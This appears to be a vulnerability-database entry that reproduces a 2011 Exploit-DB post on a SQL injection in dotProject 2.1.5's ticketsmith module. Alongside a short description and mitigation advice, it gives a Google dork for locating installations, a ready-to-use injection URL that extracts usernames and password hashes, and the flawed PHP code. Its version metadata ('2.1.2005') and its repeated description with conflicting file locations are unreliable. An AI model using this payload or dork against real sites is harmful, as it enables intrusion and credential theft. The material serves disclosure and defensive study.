dotProject 2.1.5 SQL Injection Vulnerability

vendor:

dotProject

by:

sherl0ck_

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: dotProject

Affected Version From: 2.1.2005

Affected Version To: 2.1.2005

Patch Exists: YES

Related CWE: N/A

CPE: a:dotproject:dotproject:2.1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian GNU/Linux 5.0

2011

dotProject 2.1.5 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The vulnerable code is located in the modules/ticketsmith/view.php file, where the user-supplied input is not properly sanitized before being used in a SQL query. This can be exploited to manipulate the SQL query by injecting arbitrary SQL code. The vulnerable code is located in the modules/ticketsmith/common.inc.php file, where the user-supplied input is not properly sanitized before being used in a SQL query. This can be exploited to manipulate the SQL query by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries that are executed against the database. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: dotProject 2.1.5 SQL Injection Vulnerability
# Google Dork: intitle:"dotproject"
# Date: 2011-12-09
# Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org> @AlligatorTeam
# Software Link: http://www.dotproject.net/
# Version: 2.1.5 (tested)
# Tested on: Debian GNU/Linux 5.0

---------------
PoC
---------------

URL:
http://www.site.com/dotproject/index.php?m=ticketsmith&a=view&ticket=-2union
all select
1,2,3,@@VERSION,5,USER(),7,8,9,10,11,12,13,DATABASE(),group_concat(user_username,0x3A,user_password,0xA),16
from dotp_users

---------------
Vulnerable code
---------------

modules/ticketsmith/view.php
...
11 $ticket = dPgetParam($_GET, 'ticket', '');
...
219 $ticket_info = query2hash("SELECT * FROM {$dbprefix}tickets WHERE ticket
= $ticket");
...

Functions:

includes/main_functions.php
...
283 function dPgetParam(&$arr, $name, $def=null) {
284   return defVal($arr[$name], $def);
285 }
...

modules/ticketsmith/common.inc.php
...
 50 /* get result in associative array */
 51 function query2hash ($query) {
 52
 53   $result = do_query($query);
 54   $row = @mysql_fetch_array($result);
 55   return($row);
 56
 57 }
...
 22 function do_query ($query) {
 23   $result = @mysql_query($query);
 24   if (!$result) {
 25     fatal_error("A database query error has
occurred!<br>".mysql_error());
 26   } else {
 27     return($result);
 28   }
 29
 30 }